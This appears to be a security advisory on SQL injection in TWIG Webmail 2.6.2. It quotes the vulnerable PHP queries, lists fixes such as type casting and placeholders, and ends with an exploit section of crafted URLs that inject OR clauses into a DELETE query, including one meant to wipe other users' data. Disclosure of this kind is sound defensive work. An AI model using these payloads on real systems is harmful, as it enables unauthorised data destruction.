|
Brought to you by:
Suppliers of:
|
|
|
| |
| TWIG is a cross-platform and browser-independent way to access information. The TWIG software uses unquoted SQL queries in its code, and this allows a remote attacker to insert additional SQL commands with his user input. |
| |
Credit:
The information has been provided by jenggo, Luki Rustianto, Ben Efros, Ryan Fox and Ben Laurie.
|
| |
Vulnerable systems:
TWIG Webmail version 2.6.2
Unquoted SQL query string is a little mistake that could lead to huge damage. TWIG free PHP Webmail system is affected.
MySQL accepts unquoted query string if the field type is int, mediumint, tinyint or like. The query:
DELETE FROM mytable WHERE id='1' AND owner='karet'
Has the same effect when it is entered as follows:
DELETE FROM mytable WHERE id=1 AND owner='karet'
However additional caution must be made if variable 'id' values on above example is a user supplied data thus could make that user to have control over sql query and made a modified version of query like:
DELETE FROM mytable WHERE id=1 OR id=2 OR id=3 AND owner='karet'
^^^^^^^^^^^^^^^^
(modified value)
The modified query string above, of course, has different meanings from what it was originally intended for (The value of "$id=1" is changed to "$id=1 OR id=2 OR id=3").
Doing a 'grep -r "WHERE id=" <TWIG installation dir>/lib/*' will output a lot of interesting function that have their query string match our need (use unquoted SQL queries).
Here are a few examples:
groups/personal.groups.inc.php3:
$query = "UPDATE " . $dbconfig["groups_table"] . " SET groupname='" .
$newname . "' WHERE id=" . $groupid;
[... lots other]
schedule/schedule.edit.inc.php3:
$query = "DELETE FROM " . $dbconfig["schedule_table"] . " WHERE id = " .
$data["id"] . " AND (" . $groupquery . ")";
[... lots other]
Solutions:
1) Force number fields to be numbers via type casting.
Example:
$query="SELECT field,otherfield from table where ID='" . ((int)$IDNumber) . "'";
2) Always use addslashes() to any form posted variable.
Example:
$query="SELECT field,otherfield from table where ID='" . addslashes($IDNumber) . "'";
3) Code a function specifically to strip any possible malicious characters out of strings.
4) Use SQL placeholders, so that the dangerous values are not included in the statement at all.
Example:
SELECT foo, bar FROM wotsit WHERE thingy=?;
And the ? is supplied as a separate value.
Exploit:
Login as a normal user account ('eca' in this example), select the 'bookmarks' option and choose 'edit'. View the page source and find the important value:
[Cut to only show strings we are interested in]
<==>
<hr><form action=/webmail/index.php3 method=POST>
<input type=hidden name=twig_sid value="983392539-1-eca">
<input type=hidden name=twig_cid value="983392539-14-eca">
<input type=hidden name=data[id] value=3>
<input type=hidden name=ItemID value=3>
<==>
<select name=data[groupid]>
<option value=0 >Unfiled</option>
<==>
<input type=submit name=submitbutton[delete] value="Delete">
<==>
NOTE: The URL could be different, depending on what type of authentication you use. In this example, sqltable is used.
Actual URL:
http://192.168.0.18/webmail/index.php3?ts=983392426&twig_sid=983392414-1-eca&
twig_cid=983392414-14-eca&ItemID=3
Change it to:
http://192.168.0.18/webmail/index.php3?ts=983392426&twig_sid=983392539-1-eca&t
wig_cid=983392539-14-eca&ItemID=2&data[groupid]=0&
submitbutton[delete]=Delete&data[id]=2%20or%20id%3d2
Or for more damage (deleting all data):
http://192.168.0.18/webmail/index.php3?ts=983393006&twig_sid=983393050-1-eca&
twig_cid=983393050-14-eca&ItemID=2&data[id]=2%20or%20groupid%3d0&data[groupid]=0&
submitbutton[delete]=Delete
(NOTE: all URLs were wrapped for better readability)
The above URL would change the SQL query from:
DELETE FROM twig_bookmarks WHERE id=3 AND groupid=0 AND username='eca'
To:
DELETE FROM twig_bookmarks WHERE id=2 or id=2 AND groupid=0 AND username='eca'
Or for "more damage" URL:
DELETE FROM twig_bookmarks WHERE id=2 or groupid=0 AND groupid=0 AND username='eca'
|
|
|
|
|
